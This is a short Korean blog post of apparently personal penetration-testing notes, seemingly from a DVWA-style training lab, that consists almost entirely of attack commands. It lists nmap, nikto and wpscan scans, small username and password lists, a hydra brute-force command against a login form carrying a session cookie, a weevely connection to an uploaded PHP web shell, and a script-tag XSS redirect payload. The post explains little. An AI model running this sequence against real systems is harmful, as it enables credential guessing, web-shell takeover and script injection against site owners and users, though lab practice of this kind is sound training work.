Net Eng

보안 본문

카테고리 없음

보안

欲心 2024. 6. 19. 15:38
sudo su

nmap -sV -O -sS xxxxxx
nikto -h http://xxxxxx
wpscan --url http://xxxxxx
vi username.txt

minseok
pablo
vi rockyou.txt

password
agafafsa
asdasdadas
bfbfte34
hffgh4524t
gfdg45325fbf
fy4323
hydra -I -V -L username.txt -P rockyou.txt 'http-get-form://xx.Xxx.xxx.xxx/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login:H=Cookie\:PHPSESSID=v453o5b4nscgm49lbjm2m10e14;security=low:F=Username and/or password incorrect'

 

 

weevely http://xxxxx.xxxx/hackable/uploads/minseok_shell.php 1234

 

<script>document.location='http://google.com'</script>